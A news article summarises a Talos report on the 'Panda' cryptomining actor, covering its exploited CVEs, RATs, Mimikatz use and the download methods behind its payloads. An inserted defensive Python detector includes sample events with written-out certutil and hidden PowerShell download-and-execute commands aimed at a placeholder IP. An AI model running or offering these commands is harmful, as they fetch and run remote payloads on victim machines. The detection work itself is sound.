A new threat actor has generated thousands of dollars in the Monero cryptocurrency using remote access tools (RATs) and illicit cryptocurrency mining malware, Cisco’s Talos threat intelligence and research group revealed on Tuesday.
Although not highly sophisticated, the actor, which Talos refers to as Panda, is highly active, focused on persistently exploiting vulnerable web applications worldwide. The actor’s tools allow it to traverse networks, while the use of RATs also puts organizations at risk of data theft.
The group is capable of updating its infrastructure and exploits on the fly and relies on exploits released by Shadow Brokers for infiltration, as well as the open-source credential-dumping application Mimikatz.
Initially associated with last year’s MassMiner campaign, the threat actor was shortly afterwards linked to another widespread mining campaign that used a different set of command and control (C&C) servers. Panda has since updated not only its infrastructure, but also its portfolio of exploits and payloads.
The cybercriminals, Talos’ security researchers say, have been observed targeting organizations in multiple industries, including those in the banking, healthcare, transportation, telecommunications, and IT services sectors.
In July 2018, the actor was exploiting a WebLogic vulnerability (CVE-2017-10271) to drop a miner associated with MassMiner. The hackers were mass-scanning for vulnerable servers and also attempted to exploit an Apache Struts 2 vulnerability (CVE-2017-5638). A PowerShell exploit was used to download a miner payload.
“In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000,” Talos says.
Panda was also observed using Gh0st RAT and dropping other hacking tools and exploits, including Mimikatz and exploits that the Shadow Brokers are said to have stolen from the National Security Agency (NSA).
Talos researchers spotted elements of the MassMiner attacks being used in a campaign that employed a different C&C server, suggesting that the same actor might have been behind both.
In January 2019, the threat actor was exploiting a flaw in the ThinkPHP web framework (CNVD-2018-24942) to spread similar malware. In March 2019, it was using new infrastructure, although the tactics, techniques, and procedures (TTPs) remained similar.
Soon after, Panda started employing an updated payload, which used the Certutil tool in Windows to download the secondary miner payload. Exploit modules designed for lateral movement were still used, many related to the NSA exploits.
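The two download mechanisms described above (a PowerShell download in the 2018 campaign, Certutil in the updated payload) are the kind of behaviour defenders can hunt for in process-creation telemetry. The following Python is an added example, not Talos's code or anything from the report; the JSON event format, the list of web-application parent process names and the sample command lines are constructed assumptions.

```python
import json
import re

# Constructed sample process-creation events (JSON lines); not real telemetry.
SAMPLE_EVENTS = r"""
{"host": "web01", "parent_image": "java.exe", "image": "cmd.exe", "command_line": "cmd.exe /c certutil -urlcache -split -f http://203.0.113.10/update.exe C:\\Windows\\Temp\\svc.exe"}
{"host": "web01", "parent_image": "explorer.exe", "image": "certutil.exe", "command_line": "certutil.exe -verify C:\\Certs\\server.cer"}
{"host": "web02", "parent_image": "php-cgi.exe", "image": "powershell.exe", "command_line": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1')\""}
{"host": "web02", "parent_image": "explorer.exe", "image": "powershell.exe", "command_line": "powershell.exe -Command Get-ChildItem C:\\Logs"}
"""

# certutil acting as a downloader: the -urlcache switch together with a URL.
CERTUTIL_DOWNLOAD = re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.IGNORECASE)
# Common PowerShell download cradles (WebClient methods or Invoke-WebRequest).
POWERSHELL_DOWNLOAD = re.compile(
    r"powershell(\.exe)?\b.*(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)",
    re.IGNORECASE,
)
# Assumed process names of web application servers (Java for WebLogic/Struts,
# PHP for ThinkPHP); a downloader spawned by one of these is a strong signal
# of web-application exploitation rather than an administrator's action.
WEB_APP_PARENTS = {"java.exe", "w3wp.exe", "php-cgi.exe", "httpd.exe"}


def classify(event: dict) -> list[str]:
    """Return the reasons a single process-creation event looks suspicious."""
    reasons = []
    cmd = event.get("command_line", "")
    if CERTUTIL_DOWNLOAD.search(cmd):
        reasons.append("certutil used as a downloader")
    if POWERSHELL_DOWNLOAD.search(cmd):
        reasons.append("PowerShell download cradle")
    parent = event.get("parent_image", "").lower()
    if reasons and parent in WEB_APP_PARENTS:
        reasons.append(f"spawned by web application process {parent}")
    return reasons


def scan(lines: str) -> list[dict]:
    """Parse JSON-lines events and collect findings for suspicious ones."""
    findings = []
    for line in lines.strip().splitlines():
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            findings.append({"host": event["host"], "image": event["image"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```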
Over the past month, Panda has updated its C&C and payload-hosting infrastructure, but the employed malware remains relatively similar to what was used in May 2019. In August, the hackers added another set of domains to their inventory, the researchers say.
“Panda’s operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated,” Talos concludes.